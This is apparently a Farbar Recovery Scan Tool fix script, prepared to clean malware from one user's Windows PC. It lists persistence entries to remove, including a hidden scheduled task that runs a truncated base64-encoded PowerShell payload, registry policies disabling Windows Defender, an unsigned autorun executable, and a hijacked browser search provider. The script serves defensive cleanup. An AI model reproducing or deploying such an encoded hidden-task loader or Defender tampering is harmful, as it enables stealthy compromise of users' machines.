start::
closeprocesses:
createrestorepoint:
virustotal: C:\Users\justi\AppData\Roaming\Bloom\Bloom.exe
HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiSpyware] Restriction <==== ATTENTION
HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiVirus] Restriction <==== ATTENTION
HKU\S-1-5-21-1768999186-3654096693-2326549866-1001\...\Run: [Bloom] => C:\Users\justi\AppData\Roaming\Bloom\Bloom.exe [134392243 2022-04-09] (Bloom app) [Fichier non signé] <==== ATTENTION
Task: {04A61DB0-3636-4C17-8A1C-331DB79E6EF5} - System32\Tasks\chrome panel => cmd /c powershell -WindowStyle Hidden -E "CgAKACQAagBwAD0AJABuAHUAbABsADsACgAKAAoAJABzAHQAcgBBAHMAYwBFAG4AYwBUAGUAeAB0AD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKACQAagBkACAAPQAgACQAbgB1AGwAbAA7AAoACgAKAGYAdQBuAGMAdABpAG8AbgAgAGcAZQB0AE4AZQB3AFAAcgBvAHAAKABbAH (l'élément de données a 5019 caractères en plus). <==== ATTENTION
Edge DefaultSearchURL: Default -> hxxps://feed.pdfconvertersearchonline.com/?q={searchTerms}&publisher=pdfconvertersearchonline&barcodeid=590490000000000
Edge DefaultSearchKeyword: Default -> PDFConverterSearchOnline
Edge DefaultSuggestURL: Default -> hxxps://api.pdfconvertersearchonline.com/suggest/get?q={searchTerms}
Edge Extension: (PDFConverterSearchOnline) - C:\Users\justi\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\hcmcpfkfangfafgammpgkhbiogchfegd [2022-06-11]
Edge HKLM-x32\...\Edge\Extension: [caiblelclndcckfafdaggpephhgfpoip]
Edge HKLM-x32\...\Edge\Extension: [emgfgdclgfeldebanedpihppahgngnle]
CHR HKLM-x32\...\Chrome\Extension: [caljgklbbfbcjjanaijlacgncafpegll]
CHR HKLM-x32\...\Chrome\Extension: [ccbpbkebodcjkknkfkpmfeciinhidaeh]
CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk]
S2 CLFCL5.21; \SystemRoot\System32\drivers\CLFCL5.21\000.fcl [X]
cmd: sfc /scannow
emptytemp:
end::